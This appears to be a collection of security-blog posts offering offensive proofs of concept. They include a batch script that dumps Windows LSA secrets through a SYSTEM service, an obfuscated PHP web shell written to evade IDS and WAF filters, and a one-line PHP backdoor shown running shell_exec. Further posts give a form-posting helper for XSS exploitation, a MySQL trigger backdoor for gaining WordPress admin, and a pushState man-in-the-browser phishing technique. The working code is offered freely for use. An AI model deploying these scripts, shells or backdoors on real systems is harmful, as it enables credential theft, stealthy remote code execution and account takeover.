For those of you who doesn't know what it is; let me quote Microsoft:

"The Local Security Authority (LSA) is a protected subsystem of Windows that maintains information about all aspects of local security on a system, collectively known as the local security policy of the system. In addition to housing policy information, the LSA provides services for translation between names and security identifiers (SIDs)." - Microsoft.

Sadly, I'm also quite a tinfoil-hat when it comes to shady password recovery tools.

So I read up about it, and here you go!
A small PoC which dumps your LSA secrets. Written in Batch!

@echo off
@break off

sc create theif binpath= "regedt32 /E C:\lsa.reg HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets" type= own type= interact

sc start theif
:wait
if exist "C:\lsa.reg" (
  goto done
) else (
  goto wait
)
:done
sc delete theif
more C:\lsa.reg

...For the few of those who find yourselves in the same situation.

This is what it does:

• Initializes a new Windows service (in order to export the keys).
• Invokes the service (it will run as SYSTEM. It's the only way I could figure out in order to obtain the registry hive).
• Waits until the dump file is generated...
• Opens it up in our-all-favorite more.

You may download it here.

Enjoy!

Funny thing is, most server technologies, PHP, ASP (.NET), Java variants, Pyhon (django) etc, all appear to be vulnerable to different variants of the attack.

It consists of abusing the hashtable datastructure(s) in a way which all forces the keys to generate the same hash (checksum), and by doing so placing all data in the same bucket(s).

Basically, you trigger the hashtable(s) worst case scenario(s).
...That takes CPU...

You may download their presentation here, in order to get a more in-depth explanation about their findings.

My fellow mates 'sasha' and 'swestres' started generating collisions for various languages and I took part of their research and made this PoC affecting the hashing algorithm DJBX33A used in PHP5.

So here you go folks, no license, play with the PoC as you wish!
(It's supposed to work with SSL and over Mono!)

Thats it!

Take care & happy new years!

Cheers!

My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this:

@$_[]=@!+_;

PHP will try to parse the green underscore as a constant, when the interpreter is unable to find the constant it will prompt you with a notice. I surpress the notice warning using the '@'.

The "lost-constant" in turn will be converted to a string (string(1) "_").

Just like Gareth Hayes, I used the plus-operator (red) to cast the string to an integer (int(0)).

By appending the exclamation-mark (blue), the value 0 will be casted to a boolean (bool(true)).

So far so good! We have a boolean saying true!

I try to store it by pushing the value into the array $_ (yellow). However it doesn't exist.
By suppressing that too, PHP will automagically create it for you, and your value will get stored.

That's how I initialize my array. So, what do we do know?
Well, just like Mr. Gareth stated, if you try to access an array as a string in PHP.
It will generate the string "Array".

If we have a string, we can generate other strings out of it by (ab)using AND, OR and XOR.

I figured, I had quite a few characters I easily could generate in PHP.
So I coded this fuzzer in VB.NET which permutated through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now when I'm thinking about it later on, I could have added COOKIE too...)

Never the less, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt.

By analyzing the results, you'll notice we're able to generate all of those three methods by using only a 15 character list.
But for the sake of clarity, I choosed to go with GET.

By utilizing some boolean magic and variable dereferencing I ended up with this:

<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth - h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>

...if WordPress tampered with the bytes, you may download it here.

The method for execution used in the Tiny PHP Shell and Gareth's shell remains the same.
But if you look at it, I added a few sneak factors.

1. No quotes! Quotes tend to trigger IDS'es and WAF's.
2. No use of functions.
3. No strings.
4. No numbers.
5. No constants.

If you're going to the Chaos Communication Congress - 28C3 (2011), then see you there!

Ciao.

function loadFile(url){
	if(typeof(url)=='string'){
		file = document.createElement("iframe");
		$('body').append(file);
		form = document.createElement("form");
		$(form).attr({"action":url,"method":"POST"});
		$(form).append($(document.createElement('input')).attr({"name":"postKey","value":"postVal"}));
		$(file).contents().find('body').append(form);
		$(form).submit();
		return file;
	}else{
		return 1;
	}
}

This function can be useful in the act of exploitation cross site scripting vulnerabilities or just for productional use.

'Nuff said.
Cya soon.

 Trigger based backdoors in MySQL.

• So what are they? 
  A trigger in MySQL acts as a callback on which is executed before and/or after an UPDATE/INSERT is finished.
  Take this for example: A unicorn have played with a WordPress database.
  He inserted a trigger which would interact with a specific table, say wp_comments.
  When someone would post a comment, it would get inserted into wp_comments and the trigger would be called.
• What can you do with MySQL?
  Well. That depends on your permissions (obviously).
  But basically tamper with tables.
• So what can be done with WordPress?
  Say the unicorn made an evil trigger which allowed modification of WordPress administrators whenever a specific comment got posted. Say the unicorn could add new admins (e.g; himself).
  If he now happened to add himself. He would get access to WordPress plugin feature, which in turn, would allow him to upload an even more evil plugin. (PHP Shell).

I have always been fascinated by the concept of a victim browsing around on a website not knowing that I can see everything he does, and all this from a simple XSS! After I stumbled upon a relatively new HTML5 function in the window.history object called "pushState", I just had to make a proof of concept.

What does this function do?

Well, it's made for manipulating the browser history and it will also let you tamper the URL bar, if you for example load "myajaxsite/asd.php" with AJAX you could show "myajaxsite/#asd" in the URL. This means we can manipulate the URL to whatever we want, since the function doesn't even force us to make a request to the new URL, it just pushes an item into the history and changes the URL.

How can we exploit this?

There's two scenarios I have come up with, let's start with the simple one. How to use this in a Phishing attack.

1. An attacker has an XSS on facebook.com/somepath/someotherpath/blabla/uglylongpath?xss=hello
2. The attacker injects a script in the victims browser that uses the history.pushState function to spoof the URL to facebook.com/login.php. This will cause the URL bar to display http://facebook.com/login.php, but won't cause the browser to load login.php or even check that it exists.
3. The victim enters the link, it looks like he has to login to see this content. He is a bit suspicious, so he checks the source code for malicious stuff but finds nothing since he is looking at the sourcecode of facebook.com/login.php instead of the attackers URL.
4. The victim logs in, and the attacker steals the form data.

Pretty straight-forward scenario, don't you think?

But that's boring. Let's take it to the not-so-straight-forward scenario, the man-in-the-browser.

So, what exactly IS a man-in-the-browser attack? Here's a short description from OWASP:

The Man-in-the-Browser attack is the same approach as Man-in-the-middle attack, but in this case a Trojan Horse is used to intercept and manipulate calls between the main application’s executable (ex: the browser) and its security mechanisms or libraries on-the-fly.

Basicly, I wrote a PoC on this concept...

The PoC is pretty straight-forward, it hooks all links and forms and prevents them to link away and instead we load the page with AJAX and spoof the URL with the history.pushState method.

If we "misuse" CORS (Cross-Origin Resource Sharing), we can have the control center and log at some other domain.

Of course, we cannot load resources cross-domain by default, so if we fail to load a resource we will just use the window.open() method instead.

So. What if the victim uses the back button in his browser? For this I found another nifty method, when you go back in your browser history, a window.onpopstate() event is called, so we can load the previous resource instead to show the user.

To sum up, the only way to really "get away" from this evil hook is to enter another URL in the URL bar and navigate away. Of course noscript will prevent these kind of attacks but that is not relevant. Is there any fast way to know you are infected by an attack like this? No, at least not that I know of. Normally you could identify it by malicious looking links, the URL bar not changing or viewing the source but all these things are void with if the attacker uses these methods.

...And for you who wish to test this out, here is the PoC: MITB.zip

In fact, I encourage you to try it out, it's pretty creepy!

Cheers!

Update: This is now part of the BeEF framework!

This is really pointless, but someone might be interested in it.
So here you go folks!

<?=($_=@$_GET[2]).@$_($_GET[1])?>

It doesn't look like much so let me explain.

PHP allows strings to be interpreted as function calls.
That's a major part on how callbacks in PHP work.

Example:

<?

$array = array(1,2,3);

array_walk($array, 'f');

function f($x){echo $x * 2;}

?>

What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list.
The function f() prints out the value from the array and multiplies it by two.
The output results in: 246.

The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()).

What does that mean?
Well, to put it short, you're able to take a string - and execute it as a function name.
Now, let's try something... fuzzier...

<?

$fuzz = 'phpinfo';

$fuzz();

?>

What might this do?
Will it execute?
Damn right.

Now let's tear my tiny code apart.
It's made out of two parts.

1. $_=@$_GET[2]
2. @$_($_GET[1])

The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument.

The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.

Conclusion: Copy and paste the snippet, and store it in a PHP-file.
Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami

The response should be something like:
apache
...or as on Windows if you're running your server as a service:
nt authority/system.

Conclusion; PHP is fun!

Ciao!

Just to clear things out, the title appears more frightening than it actually is.

As we all know, Microsoft Windows have this passion for running background services.
Most of those services are running under a greatly privileged account called SYSTEM.

If you have administrative permission on a Windows 7 (as well as Windows XP, Windows Vista...) - you are allowed to change the behavior of those services.

If you put together A and B, you'll see where this is working out.

My friend Mathias Karlsson showed me a nifty way of doing that, using only two commands in cmd.
The trick is to use the task scheduler (windows crontabs) in order to execute arbitrarily commands on demand.
The result is the very same as the "runas-interactive-exploit" for Microsoft Windows XP (hence the title).

So here it goes! A proof-of-concept!

1. Run the batch.
   
2. Get prompted by windows.
   
3. Press: "View the message".
4. Login!
   
5. Press "Return now" when you're done - in order to return to your regular account.

Download the PoC here.

That's it!
Have fun.

Ciao!